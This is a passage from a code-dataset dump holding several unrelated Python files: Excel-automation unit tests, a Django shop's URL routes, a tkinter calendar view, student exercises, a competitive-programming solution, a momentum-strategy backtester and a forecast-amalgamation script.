HttpResponseNotFound()","repo_name":"isaui/my-actual-bookphoria","sub_path":"ReviewApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6492078927","text":"# Copyright (c) 2020 safexl\r\nimport unittest\r\nimport tempfile\r\nimport pythoncom\r\nimport pywintypes\r\nimport win32com.client\r\nimport safexl\r\n\r\n\r\nclass test_is_excel_open(unittest.TestCase):\r\n def test_when_excel_is_open(self):\r\n pythoncom.CoInitialize()\r\n application = win32com.client.Dispatch(\"Excel.Application\")\r\n self.assertTrue(safexl.is_excel_open())\r\n safexl.kill_all_instances_of_excel(application)\r\n del application\r\n pythoncom.CoUninitialize()\r\n\r\n def test_when_excel_is_not_open(self):\r\n safexl.kill_all_instances_of_excel()\r\n self.assertFalse(safexl.is_excel_open())\r\n\r\n\r\nclass test_excel_open_files(unittest.TestCase):\r\n @staticmethod\r\n def count_tempfiles():\r\n return sum(1 for file in safexl.toolkit.excel_open_files() if file.endswith(\".tmp\"))\r\n\r\n def test_that_results_update_immediately(self):\r\n safexl.kill_all_instances_of_excel()\r\n self.assertFalse(safexl.is_excel_open())\r\n\r\n pythoncom.CoInitialize()\r\n application = win32com.client.Dispatch(\"Excel.Application\")\r\n\r\n # no workbooks have been added yet\r\n open_files_1 = self.count_tempfiles()\r\n self.assertEqual(0, open_files_1)\r\n\r\n # 1 workbook added, 1 more .tmp file than before\r\n wb1 = application.Workbooks.Add()\r\n open_files_2 = self.count_tempfiles()\r\n self.assertEqual(1, open_files_2)\r\n self.assertEqual(open_files_1 + 1, open_files_2)\r\n\r\n # 2 workbooks added, 1 more .tmp file than before\r\n wb2 = application.Workbooks.Add()\r\n open_files_3 = self.count_tempfiles()\r\n self.assertEqual(2, open_files_3)\r\n self.assertEqual(open_files_2 + 1, open_files_3)\r\n\r\n # 1 workbook removed, 1 less .tmp file than before\r\n application.DisplayAlerts = False\r\n wb2.Close(SaveChanges=False)\r\n application.DisplayAlerts = True\r\n open_files_4 = self.count_tempfiles()\r\n self.assertEqual(1, open_files_4)\r\n self.assertEqual(open_files_3 - 1, open_files_4)\r\n\r\n # 2 workbooks removed, 1 less .tmp file than before, back to beginning\r\n application.DisplayAlerts = False\r\n wb1.Close(SaveChanges=False)\r\n application.DisplayAlerts = True\r\n open_files_5 = self.count_tempfiles()\r\n self.assertEqual(0, open_files_5)\r\n self.assertEqual(open_files_4 - 1, open_files_5)\r\n self.assertEqual(open_files_5, open_files_1)\r\n\r\n safexl.kill_all_instances_of_excel(application)\r\n del application\r\n pythoncom.CoUninitialize()\r\n\r\n def test_that_newly_saved_file_is_picked_up_and_lost_when_closed(self):\r\n pythoncom.CoInitialize()\r\n application = win32com.client.Dispatch(\"Excel.Application\")\r\n\r\n wb1 = application.Workbooks.Add()\r\n with tempfile.TemporaryDirectory() as temp_dir:\r\n save_filepath = f\"{temp_dir}\\\\temporary.xlsx\"\r\n application.DisplayAlerts = False\r\n wb1.SaveAs(save_filepath)\r\n\r\n self.assertIn(save_filepath, safexl.toolkit.excel_open_files())\r\n wb1.Close()\r\n self.assertNotIn(save_filepath, safexl.toolkit.excel_open_files())\r\n\r\n application.DisplayAlerts = True\r\n\r\n safexl.kill_all_instances_of_excel(application)\r\n del application\r\n pythoncom.CoUninitialize()\r\n\r\n\r\nclass test_kill_all_instances_of_excel(unittest.TestCase):\r\n def test_can_kill_excel_instance(self):\r\n pythoncom.CoInitialize()\r\n 
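# Illustrative aside (added comment, not safexl source): the module name\r\n        # test_psutil_wrappers suggests is_excel_open() is built on psutil, so a\r\n        # plausible sketch of such a check is the following; it is an assumption\r\n        # and is kept commented out so the test behaviour is unchanged:\r\n        #     import psutil\r\n        #     def is_excel_open():\r\n        #         return any((p.info[\"name\"] or \"\").lower() == \"excel.exe\"\r\n        #                    for p in psutil.process_iter([\"name\"]))\r\n        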
application = win32com.client.Dispatch(\"Excel.Application\")\r\n\r\n self.assertEqual(\"Microsoft Excel\", application.Name)\r\n safexl.kill_all_instances_of_excel()\r\n with self.assertRaises(pywintypes.com_error):\r\n app_name = application.Name\r\n\r\n del application\r\n pythoncom.CoUninitialize()\r\n\r\n def test_can_kill_excel_instance_when_passed_app(self):\r\n pythoncom.CoInitialize()\r\n application = win32com.client.Dispatch(\"Excel.Application\")\r\n\r\n self.assertEqual(\"Microsoft Excel\", application.Name)\r\n safexl.kill_all_instances_of_excel(application)\r\n with self.assertRaises(pywintypes.com_error):\r\n app_name = application.Name\r\n\r\n del application\r\n pythoncom.CoUninitialize()\r\n\r\n def test_can_kill_multiple_excel_instances(self):\r\n pythoncom.CoInitialize()\r\n\r\n # Using DispatchEx specifically here to create multiple instances of Excel open at once\r\n application1 = win32com.client.DispatchEx(\"Excel.Application\")\r\n application2 = win32com.client.DispatchEx(\"Excel.Application\")\r\n application3 = win32com.client.DispatchEx(\"Excel.Application\")\r\n\r\n self.assertEqual(\"Microsoft Excel\", application1.Name)\r\n self.assertEqual(\"Microsoft Excel\", application2.Name)\r\n self.assertEqual(\"Microsoft Excel\", application3.Name)\r\n\r\n safexl.kill_all_instances_of_excel()\r\n\r\n with self.assertRaises(pywintypes.com_error):\r\n app_name = application1.Name\r\n with self.assertRaises(pywintypes.com_error):\r\n app_name = application2.Name\r\n with self.assertRaises(pywintypes.com_error):\r\n app_name = application3.Name\r\n\r\n del application1\r\n del application2\r\n del application3\r\n pythoncom.CoUninitialize()\r\n","repo_name":"ThePoetCoder/safexl","sub_path":"safexl/tests/test_psutil_wrappers.py","file_name":"test_psutil_wrappers.py","file_ext":"py","file_size_in_byte":5357,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"3"} +{"seq_id":"35308714683","text":"import customtkinter\nfrom tksheet import Sheet\n\n\nclass CalenderWindow(customtkinter.CTkFrame):\n\tdef __init__(self, master, view, default_year):\n\t\tsuper().__init__(master)\n\n\t\tself.view = view\n\n\t\tself.setup_widgets()\n\t\tself.year_combo.set(default_year)\n\t\tself.configure_grid()\n\n\tdef configure_grid(self):\n\t\tself.grid_columnconfigure(1, weight=1)\n\t\tself.grid_rowconfigure(3, weight=1)\t\t\n\n\tdef setup_widgets(self):\n\t\tcustomtkinter.CTkLabel(self, text=\"CALENDAR\", font=self.view.page_title_font).grid(row=0,\n\t\t\t\t\t\t\t\t\t\t column=0, padx=self.view.padx*3, pady=self.view.pady, sticky=\"NW\")\n\n\t\tself.year_combo = customtkinter.CTkComboBox(self, command=self.combobox_callback)\n\t\tself.year_combo.grid(row=2, column=0, padx=self.view.padx, pady=self.view.pady, sticky=\"NSEW\")\n\n\t\tself.calender_sheet = self.view.setup_tksheet_table(self, [\"Week\", \"Race\", \"Circuit\", \"City\", \"Country\", \"Winner\"])\n\t\tself.calender_sheet.grid(row=3, column=0, columnspan=2, padx=self.view.padx, pady=self.view.pady, sticky=\"NSEW\")\n\t\t# self.calender_sheet.change_theme(theme=\"dark blue\", redraw=True)\n\t\tself.calender_sheet.set_options(auto_resize_columns=True)\n\n\t\tself.calender_sheet.column_width(column=0, width=20)\n\t\tself.calender_sheet.column_width(column=1, width=240)\n\t\tself.calender_sheet.column_width(column=2, width=240)\n\t\tself.calender_sheet.column_width(column=3, width=70)\n\t\tself.calender_sheet.column_width(column=4, 
width=70)\n\n\t\tself.calender_sheet.enable_bindings(\"single_select\")\n\t\tself.calender_sheet.bind(\"\", self.click_calandar)\n\n\n\tdef update_window(self, data):\n\t\t\n\t\tself.year_combo.set(data[\"year\"])\n\t\tself.calender_sheet.set_sheet_data(data=data[\"calender\"],\n reset_col_positions=False,\n reset_row_positions=True,\n redraw=True,\n verify=False,\n reset_highlights=False,\n\t\t\t )\n\n\t\tself.year_combo.configure(values=data[\"years\"])\n\n\tdef click_calandar(self, event):\n\t\tcurrently_selected = self.calender_sheet.get_currently_selected()\n\t\tif currently_selected:\n\t\t\trow = currently_selected.row\n\t\t\tcolumn = currently_selected.column\n\n\t\t\tif column != 5:\n\t\t\t\ttrack = self.calender_sheet.get_cell_data(row, 2)\n\t\t\t\tself.view.controller.show_circuit_window(track)\n\t\t\t\tself.calender_sheet.deselect(row=row, column=column, redraw=True)\n\t\t\telse:\n\t\t\t\tself.view.controller.show_race_result(int(self.year_combo.get()), row)\n\n\tdef combobox_callback(self, event):\n\t\tself.view.controller.update_calender_window(int(self.year_combo.get()))","repo_name":"domhnallmorr/Team-Principal","sub_path":"src/view/calender_window.py","file_name":"calender_window.py","file_ext":"py","file_size_in_byte":2491,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"14183324324","text":"def zad4():\n print(dir(\"naprzykład\"))\n help(\"naprzykład\".endswith(\"ok\") )\n#zad4()\n\n\ndef zad5():\n imie =\"Mateusz Śliwiński\"\n print(imie[::-1])\n\n\ndef zad6():\n lista=[1,2,3,4,5,6,7,8,9,10]\n lista2 = []\n\n for licznik in range(5):\n lista2.append(lista[5+licznik])\n\n for licznik in range(5):\n lista.pop()\n\n print(lista)\n print(lista2)\n\ndef zad8():\n krotka = (151270, 150044, \"Andrzej\", \"Mateusz\", \"Strzeszewski\", \"Śliwiski\")\n krotka_indeksów=krotka[0:2]\n krotka_imion=krotka[2:4]\n krotka_nazwisk=krotka[4:6]\n print(krotka_imion)\n print(krotka_indeksów)\n print(krotka_nazwisk)\n krotka_studenta1=krotka[0:1]+krotka[2:3]+krotka[4:5]\n print(krotka_studenta1)\n krotka_studenta2 = krotka[1:2] + krotka[3:4] + krotka[5:6]\n print(krotka_studenta2)\n#zad8()\n\n\n\ndef zad9():\n studenci = {\n 151270: (21, \"andrzej@andrzejowadomena.pl\", 1999, \"Warszawa ul Słoneczna 11\"),\n 150044: (21, \"mati@mati.pl\", 1999, \"Lubowidz ul. 
Zielona 6\"),\n }\n print(studenci[151270])\n\n\ndef zad10():\n numery = [1, 2, 2, 2, 2, 3, 56]\n numery = set(numery)\n print(numery)\n\ndef zad11():\n for i in range (11):\n print(i)\n\ndef zad12():\n for i in range(100, 15, -5):\n print(i)\n\n\n","repo_name":"Gojira99/PSI-Projekt","sub_path":"lab1.py","file_name":"lab1.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"25064820696","text":"# https://codeforces.com/contest/1365/problem/C\n\n\nimport collections\n\n\ndef eval(N, D1, D2):\n d1 = dict()\n d2 = dict()\n\n for i in range(N):\n d1[D1[i]] = i\n d2[D2[i]] = i\n\n Da = collections.defaultdict(int)\n Db = collections.defaultdict(int)\n\n for i in D1:\n # right move\n dd = d1[i] - d2[i]\n if dd == 0:\n l1 = 0\n elif dd < 0:\n l1 = dd + N\n else:\n l1 = dd\n\n # Left move\n dd2 = d2[i] - d1[i]\n if dd2 == 0:\n l2 = 0\n elif dd2 < 0:\n l2 = dd2\n else:\n l2 = dd2 - N\n\n Da[l1] += 1\n Db[l2] += 1\n\n print(max(max(Da.values()), max(Db.values())))\n\n\n# collect input:\nN = int(input())\nD1 = list(map(int, input().split()))\nD2 = list(map(int, input().split()))\neval(N, D1, D2)\n","repo_name":"jkfer/Codeforces","sub_path":"648/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"27884626720","text":"from django.urls import path\nfrom .views import index, carrito, tienda, quienessomos, form_producto, \\\n lista_productos, form_cliente, lista_clientes, mod_producto, eliminar_producto, \\\n mod_cliente, eliminar_cliente, registro,agregar_producto, eliminar_prod, restar_producto, limpiar_carrito,\\\n comprar, historial\n\n \n\n\nurlpatterns = [\n path('', index, name=\"index\"),#el primer html que mostrara\n path('carrito', carrito, name=\"carrito\"),\n path('tienda', tienda, name=\"tienda\"),\n path('quienessomos', quienessomos, name=\"quienessomos\"),\n path('form_producto/', form_producto, name=\"form_producto\"),\n path('lista_productos/', lista_productos, name=\"lista_productos\"),\n path('form_cliente/', form_cliente, name=\"form_cliente\"),\n path('lista_clientes/', lista_clientes, name=\"lista_clientes\"),\n path('mod_producto/', mod_producto, name=\"mod_producto\"),\n path('eliminar_producto/', eliminar_producto, name=\"eliminar_producto\"),\n path('mod_cliente/', mod_cliente, name=\"mod_cliente\"),\n path('eliminar_cliente/', eliminar_cliente, name=\"eliminar_cliente\"),\n path('registro/', registro, name=\"registro\"),\n path('agregar//', agregar_producto, name=\"Add\"),\n path('eliminar//', eliminar_prod, name=\"Del\"),\n path('restar//', restar_producto, name=\"Sub\"),\n path('limpiar/', limpiar_carrito, name=\"CLS\"),\n path('comprar/', comprar, name=\"comprar\"),\n path('historial/', historial, name=\"historial\"),\n \n \n] ","repo_name":"udrax1/Django_Urbina_Blamey","sub_path":"petfriends/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71860713362","text":"import pandas as pd\r\nfrom pandas_datareader import data as pdr\r\nimport sys\r\nsys.path.append('C:/Users/Billy/Documents/PRISMO/Backtester')\r\nfrom base_model_backtest import backtest\r\nimport datetime\r\nimport os\r\nfrom tqdm import tqdm_notebook\r\nimport time\r\nimport numpy as np\r\nimport pickle\r\nfrom itertools import compress\r\n\r\n\r\nclass 
momentum_1(backtest):\r\n def __init__(self, \r\n timeSeries, \r\n inIndex,\r\n toTrade, \r\n shape, \r\n printBool, \r\n plotBool,\r\n decimalPlaces = 10,\r\n formationPeriod = None, \r\n logDir = None,\r\n capitalPerTrade = 100,\r\n decileQuantity = 10,\r\n holdingPeriod = 1,\r\n timeSeriesOpen = None,\r\n simeltaneouslyOpenTrades = 1):\r\n\r\n super().__init__(timeSeries, \r\n toTrade, \r\n shape, \r\n printBool, \r\n plotBool,\r\n decimalPlaces,\r\n lookback=formationPeriod,\r\n logDir=logDir)\r\n \r\n \r\n self.directory = logDir \r\n self.features = toTrade \r\n #Decimal Places should be assigned globally for transparency\r\n self.decimalPlaces = decimalPlaces\r\n self.timeSeries = timeSeries\r\n \r\n self.lookbackStd = 10\r\n self.lookbackMean = 10\r\n\r\n\r\n self.holdingPeriod = holdingPeriod\r\n self.T = formationPeriod #formation period\r\n self.decileQuantity = decileQuantity\r\n self.simeltaneouslyOpenTrades = simeltaneouslyOpenTrades #number of simeltaneous trades, per asset\r\n self.indexes = pd.MultiIndex.from_product([['returns','returnsCum','returnsMean','returnsStd','returnsRiskAdj'],list(self.features)])\r\n \r\n \r\n #Store all returns values\r\n self.returnsDf = pd.DataFrame(index = self.indexes)\r\n \r\n \r\n self.capitalPerTrade = capitalPerTrade\r\n \r\n #Blank template for new row\r\n self.newRow = pd.DataFrame(index = self.indexes)\r\n\r\n self.openPrices = timeSeriesOpen\r\n\r\n self.inIndexDf = inIndex\r\n self.featuresInIndex = None\r\n \r\n\r\n def run(self):\r\n # pls dont bully me for using a counter as an index, the enumerate function outpits price as a row not a pandas series F\r\n for index, row in enumerate(self.timeSeries.itertuples()):\r\n\r\n self.featuresInIndex = [x for x in compress(self.features, self.inIndexDf.iloc[index].tolist())]\r\n\r\n #Stupid but this creates a list of [date, price1, price2, ...]\r\n \r\n closePrices = row\r\n openPrices = [pd.DataFrame(self.openPrices.iloc[index]).columns[0]] + self.openPrices.iloc[index].tolist()\r\n \r\n #Create array of open orders to pass into strategy\r\n if self.orderbook is not None and len(self.orderbook)>0:\r\n openOrderBook = self.orderbook.loc[self.orderbook['openClosed']=='OPEN'] \r\n else:\r\n openOrderBook = None\r\n \r\n# print(date)\r\n \r\n orders = self.generate_signals(closePrices, openPrices, openOrderBook)\r\n# print(orders)\r\n \r\n self.tick(closePrices, orders)\r\n\r\n\r\n\r\n\r\n #Close all remaining orders\r\n #Create array of open orders to pass into strategy\r\n if self.orderbook is not None and len(self.orderbook)>0:\r\n openOrderBook = self.orderbook.loc[self.orderbook['openClosed']=='OPEN'] \r\n else:\r\n openOrderBook = None\r\n\r\n print(len(openOrderBook))\r\n orders = self.generate_signals(closePrices, openPrices, openOrderBook, closeAll = True)\r\n self.tick(closePrices, orders, closeAll = True)\r\n \r\n def generate_signals(self, closePriceRow, openPriceRow, openOrderBook, closeAll = False):\r\n\r\n orders = [] \r\n date = closePriceRow[0]\r\n yesterdaysDate = date - pd.DateOffset(1)\r\n \r\n #Update price history with the openPrices, as if its a new trading day and all we know is the open prices\r\n if closeAll != True:\r\n if self.dfOpenHistory is None:\r\n self.dfOpenHistory = pd.DataFrame([openPriceRow])\r\n self.dfOpenHistory.columns = ['Date'] + self.features\r\n self.dfOpenHistory.set_index(['Date'], inplace=True)\r\n else:\r\n temp = pd.DataFrame([openPriceRow])\r\n temp.columns = ['Date'] + self.features\r\n temp.set_index(['Date'], inplace=True)\r\n 
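# Added note for clarity: the concat below appends today's open prices to\r\n                # dfOpenHistory, while the signal statistics further down are built from\r\n                # close-price history. The risk-adjusted momentum they compute is, in\r\n                # effect (illustrative sketch of the same quantities, not extra logic):\r\n                #     rets = close_prices.pct_change()\r\n                #     risk_adj = rets.rolling(T).mean() / rets.rolling(T).std()\r\n                # and assets are ranked on risk_adj to form the top/bottom deciles.\r\n                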
self.dfOpenHistory = pd.concat([self.dfOpenHistory, temp]) \r\n \r\n \r\n #Calculate returns values based on yesterdays prices and those preceeding that.\r\n if len(self.returnsDf.columns)==0 or len(self.dfHistory)<=2:\r\n self.returnsDf.loc[('returns',slice(None)), yesterdaysDate] = 0\r\n self.returnsDf.loc[('returnsCum',slice(None)), yesterdaysDate] = 0\r\n self.returnsDf.loc[('returnsMean',slice(None)), yesterdaysDate] = 0\r\n self.returnsDf.loc[('returnsStd',slice(None)), yesterdaysDate] = 0\r\n self.returnsDf.loc[('returnsRiskAdj',slice(None)), yesterdaysDate] = 0\r\n \r\n else:\r\n \r\n if len(self.dfHistory)>2:\r\n # Returns = P(final)/P(initial)-1\r\n self.returnsDf.loc[('returns',slice(None)), yesterdaysDate] =(self.dfHistory.iloc[-1]/self.dfHistory.iloc[-2]-1).values\r\n \r\n # CumulativeReturns = P(final)/P(final-T) - 1\r\n if len(self.returnsDf.columns)>self.T:\r\n self.returnsDf.loc[('returnsCum',slice(None)), yesterdaysDate] = (self.dfHistory.iloc[-1]/self.dfHistory.iloc[-(self.T)]-1).values\r\n else:\r\n self.returnsDf.loc[('returnsCum',slice(None)), yesterdaysDate] = 0\r\n \r\n #Average of values of returns \r\n if len(self.returnsDf.columns)>self.T:\r\n self.returnsDf.loc[('returnsMean',slice(None)), yesterdaysDate] = self.returnsDf.T.returns.rolling(self.T).mean().iloc[-1].values\r\n else:\r\n self.returnsDf.loc[('returnsMean',slice(None)), yesterdaysDate] = self.returnsDf.T.returns.rolling(len(self.returnsDf.columns)).mean().iloc[-1].values\r\n \r\n #Standard Deviation of returns\r\n if len(self.returnsDf.columns)>self.T:\r\n self.returnsDf.loc[('returnsStd',slice(None)), yesterdaysDate] = self.returnsDf.T.returns.rolling(self.T).std().iloc[-1].values\r\n else:\r\n self.returnsDf.loc[('returnsStd',slice(None)), yesterdaysDate] = self.returnsDf.T.returns.rolling(len(self.returnsDf.columns)).std().iloc[-1].values\r\n \r\n #Risk Adjusted Returns\r\n meanRet = self.returnsDf.T.returnsMean.iloc[-1]\r\n stdRet = self.returnsDf.T.returnsStd.iloc[-1]\r\n riskAdjRet = meanRet/stdRet\r\n self.returnsDf.loc[('returnsRiskAdj',slice(None)), yesterdaysDate] = riskAdjRet.values\r\n \r\n\r\n\r\n\r\n ##### TO DELETE #####\r\n #Help out the thicc memory issues \r\n if len(self.returnsDf)>self.T:\r\n self.returnsDf = self.returnsDf[self.returnsDf.columns[-(self.T+1):]]\r\n self.dfOpenHistory = self.dfOpenHistory.iloc[-(self.T+1):]\r\n try:\r\n self.orderbook = self.orderbook.loc[self.orderbook.openClosed == 'OPEN']\r\n except Exception as e:\r\n pass\r\n\r\n# print(self.dfHistory, self.dfHistory)\r\n \r\n\r\n # print(date, yesterdaysDate, self.returnsDf.loc['returnsRiskAdj'])\r\n\r\n # Seperate into quantiles\r\n \r\n codesTop = (self.returnsDf.dropna().loc[('returnsRiskAdj',self.featuresInIndex), yesterdaysDate].sort_values()).iloc[-self.decileQuantity:].index.codes[1]\r\n codesBottom = (self.returnsDf.dropna().loc[('returnsRiskAdj',self.featuresInIndex), yesterdaysDate].sort_values()).iloc[:self.decileQuantity].index.codes[1]\r\n \r\n# print(self.returnsDf.dropna().loc[('returnsRiskAdj',slice(None)), date].sort_values())\r\n# print(self.returnsDf.index.levels[1][codesTop])\r\n# print(self.returnsDf.index.levels[1][codesBottom])\r\n \r\n\r\n\r\n\r\n\r\n #We should close all orders on the close price\r\n\r\n #Close all open orders on each tick\r\n if openOrderBook is not None:\r\n for index, openOrder in openOrderBook.iterrows():\r\n\r\n signal = openOrder[1]\r\n asset = openOrder[2]\r\n oldDate = openOrder[5]\r\n quantityTrade = round(openOrder[3], self.decimalPlaces)\r\n price = 
round(openOrder[4], self.decimalPlaces)\r\n orderID = openOrder[0]\r\n newDate = closePriceRow[0]\r\n newOrder = None \r\n \r\n\r\n #IF: date is >= than buying date + holding period\r\n if (signal == 'SELL'and newDate >= oldDate + pd.DateOffset(self.holdingPeriod)) or closeAll == True:\r\n newSignal = 'BUY'\r\n newQuantityTrade = -quantityTrade\r\n newPrice = self.dfHistory[asset].iloc[-1]\r\n \r\n if np.isnan(newPrice):\r\n pass\r\n else:\r\n #['ID','BUY/SELL','asset','quantity','price','date','OPEN/CLOSED']\r\n newOrder = [orderID, newSignal, asset, newQuantityTrade, newPrice, newDate,'CLOSED']\r\n orders.append(newOrder)\r\n\r\n if (signal == 'BUY' and newDate >= oldDate + pd.DateOffset(self.holdingPeriod)) or closeAll == True:\r\n newSignal = 'SELL'\r\n newQuantityTrade = -quantityTrade\r\n newPrice = self.dfHistory[asset].iloc[-1]\r\n\r\n \r\n if np.isnan(newPrice):\r\n pass\r\n else:\r\n #['ID','BUY/SELL','asset','quantity','price','date','OPEN/CLOSED']\r\n newOrder = [orderID, newSignal, asset, newQuantityTrade, newPrice, newDate,'CLOSED']\r\n orders.append(newOrder)\r\n\r\n\r\n\r\n # #TEST: only want to buy stocks when there are no currently open orders.\r\n openOrders = False\r\n if (openOrderBook is not None ) and len(orders)+len(openOrderBook)>=self.decileQuantity*(self.simeltaneouslyOpenTrades+1):\r\n openOrders = True\r\n\r\n\r\n #It's not good enough to just filter 'if stock price is in index'. This results in trades not occurring at a all.\r\n if len(self.returnsDf.columns)>self.T and closeAll != True and openOrders == False:\r\n\r\n # Create buy orders for stocks in top quantile for risk adj. returns, and create short orders for the others\r\n for topQuantileTick in list(self.returnsDf.index.levels[1][codesTop]):\r\n price = self.dfOpenHistory[topQuantileTick].iloc[-1]\r\n\r\n\r\n #CTEST: heck if the asset is in the open order book. DOn't buy if so\r\n tickOpen = False\r\n # if openOrderBook is not None:\r\n # if topQuantileTick in list(openOrderBook.asset):\r\n # tickOpen = True\r\n\r\n\r\n\r\n #topQuantileTick not in list(openOrderBook.asset) implies there are no currently open orders for the said asset.\r\n if not np.isnan(price) and topQuantileTick and tickOpen == False:\r\n quantity = float(self.capitalPerTrade/price)\r\n orders.append([None, 'BUY', topQuantileTick, quantity, price, date, 'OPEN'])\r\n\r\n for bottomQuantileTick in list(self.returnsDf.index.levels[1][codesBottom]):\r\n\r\n price = self.dfOpenHistory[bottomQuantileTick].iloc[-1]\r\n\r\n #CTEST: heck if the asset is in the open order book. 
DOn't buy if so\r\n tickOpen = False\r\n # if openOrderBook is not None:\r\n # if topQuantileTick in list(openOrderBook.asset):\r\n # tickOpen = True\r\n\r\n\r\n if not np.isnan(price) and tickOpen == False:\r\n quantity = float(-self.capitalPerTrade/price)\r\n orders.append([None, 'SELL', bottomQuantileTick, quantity, price, date, 'OPEN'])\r\n\r\n\r\n\r\n #Update price history with the close prices\r\n if closeAll != True:\r\n\r\n if self.dfHistory is None:\r\n self.dfHistory = pd.DataFrame([closePriceRow])\r\n self.dfHistory.columns = ['Date'] + self.features\r\n self.dfHistory.set_index(['Date'], inplace=True)\r\n else:\r\n temp = pd.DataFrame([closePriceRow])\r\n temp.columns = ['Date'] + self.features\r\n temp.set_index(['Date'], inplace=True)\r\n self.dfHistory = pd.concat([self.dfHistory, temp]) \r\n \r\n\r\n return orders","repo_name":"BillyRobertson/PRISMO-trading-research-and-execution-system","sub_path":"Backtester/models/momentum_1_adjRisk.py","file_name":"momentum_1_adjRisk.py","file_ext":"py","file_size_in_byte":13222,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"71985845522","text":"# ---\n# jupyter:\n# jupytext:\n# text_representation:\n# extension: .py\n# format_name: light\n# format_version: '1.5'\n# jupytext_version: 1.4.2\n# kernelspec:\n# display_name: Python 3\n# language: python\n# name: python3\n# ---\n\nimport pandas as pd \nimport numpy as np\n\nfrom utils.utils import *\nfrom utils.clarkWestTest import clarkWestTest\n\n\ndef readFile(architecture, dataset, variable, hidden = None):\n if(hidden is not None):\n if(variable == 'ALL'):\n results = pd.read_parquet('output/' + str(architecture) + '_' + str(dataset) +'_' + str(hidden).replace('[', '').replace(']', '').replace(', ', '_') + '.gzip')\n else:\n results = pd.read_parquet('output/' + str(architecture) + '_' + str(dataset) +'_' + str(hidden).replace('[', '').replace(']', '').replace(', ', '_') + '_' + str(variable).replace(' ', '').replace('%', '') + '.gzip')\n else: \n if(variable == 'ALL'):\n results = pd.read_parquet('output/' + str(architecture) + '_' + str(dataset) + '.gzip')\n else:\n results = pd.read_parquet('output/' + str(architecture) + '_' + str(dataset) +'_' + str(variable).replace(' ', '').replace('%', '') + '.gzip')\n \n return results\n\n\n# # Amalagamation\n# The main idea is to do an amalgamation per variable: i.e. the predictions of all architecture at time point t and take the average of those. This begs the question of how to combine them. For example LSTM1/CNN1 does not have the same structure as FNN1. \n#\n# Amalgamtion of the all models should be doable, things get more complicated once we start looking at all the variables.\n#\n# * Amalagamation MEV\n# * Amalgamation TA\n# * Amalgamtion ALL \n# * Amalgamation PCA MEV\n# * Amalgamation PCA TA\n# * Amalgamation PCA ALL\n# * Amalgamtion per MEV variable \n# * Amalgamation per TA variable \n\n# +\ndef amalgamateResults(results, architectures, dataset, PCA = False): \n \"\"\"\n The main idea is that I try to aggregate the predictions over all architectures with all hidden units for a single variable. Thus aggregatedict is a dictionairy with dataframe of all the predictions per varaible.\n Thus aggregatedDict{'DP'} would yield a dataframe where each column is the prediction vector of a architecture. Aka, when you take the row wise average you have an amalgamation for a variable based on all models. 
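For example (illustrative numbers only): if two architectures' prediction columns for 'DP' were [0.10, 0.20] and [0.30, 0.40], their row-wise mean, [0.20, 0.30], is the amalgamated forecast.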
\n \"\"\"\n aggregatedDict = dict()\n variables = results.Dataset.unique()\n models = results.Method.unique()\n\n \n for architecture in architectures:\n # Set the hidden unit definition depending on the architecture\n if(architecture == 'CNN' or architecture == 'RF'):\n hidden_sizes = None\n elif(architecture == 'MLP' or architecture == 'LSTM'):\n hidden_sizes = [32, 16, 8, 4, 2]\n else:\n hidden_sizes = [[32], [32, 16], [32, 16, 8], [32, 16, 8, 4], [32, 16, 8, 4, 2]] \n\n for variable in variables:\n variable = variable.replace(dataset+': ', '')\n \n # Edge case for PCA dataset with different naming convention.\n if(PCA == True):\n variable = 'PCA'\n if(hidden_sizes is not None):\n for hidden in hidden_sizes:\n #If we are dealing with ALL models, then file naming has a different sctructure.\n if(variable == 'ALL'):\n results = pd.read_parquet('output/' + str(architecture) + '_' + str(dataset) +'_' + str(hidden).replace('[', '').replace(']', '').replace(', ', '_') + '.gzip')\n else:\n #For each variation of a certain variable read the relevant file and concatenate the predictions to the dataframe stored in the aggrefatedDict dictionairy for said variable.\n results = pd.read_parquet('output/' + str(architecture) + '_' + str(dataset) +'_' + str(hidden).replace('[', '').replace(']', '').replace(', ', '_') + '_' + str(variable).replace(' ', '').replace('%', '') + '.gzip')\n \n try:\n df = pd.concat([aggregatedDict.get(variable), results.Pred], axis = 1)\n except:\n df = results.Pred\n aggregatedDict.update({variable: df})\n\n #For the architectures withouth hidden units, those are irrelevant. \n elif(hidden_sizes is None):\n #If we are dealing with ALL models, then file naming has a different sctructure.\n if(variable == 'ALL'):\n results = pd.read_parquet('output/' + str(architecture) + '_' + str(dataset) + '.gzip')\n else:\n results = pd.read_parquet('output/' + str(architecture) + '_' + str(dataset) +'_' + str(variable).replace(' ', '').replace('%', '') + '.gzip')\n \n try:\n df = pd.concat([aggregatedDict.get(variable), results.Pred], axis = 1)\n except:\n df = results.Pred\n aggregatedDict.update({variable: df})\n \n return aggregatedDict\n \n \n# -\n\ndef getAmalgamationResults(results, aggregatedDict, dataset, PCA = False):\n resultsDF = pd.DataFrame(columns=['Method', 'Dataset', 'R2', 'CW', 'DA', 'DA HA', 'MSFE', 'MSFE HA'])\n variables = results.Dataset.unique()\n models = results.Method.unique()\n \n # Get the amalgamation performance for each variable\n for variable in variables:\n variable = variable.replace(dataset+': ', '')\n \n if(PCA == True):\n variable = 'PCA'\n \n #Get the amalgamated (row wise average over all model predictions) prediction for a variable\n pred = aggregatedDict.get(variable).mean(axis=1)\n\n #Get the actual and HA from any file, they are identical in all. 
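(Added clarification: the MLP '[32]' file loaded below serves only as a\n        # template; every output file carries the same Actual and HA benchmark\n        # columns, so the amalgamated predictions can simply be swapped into Pred.)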
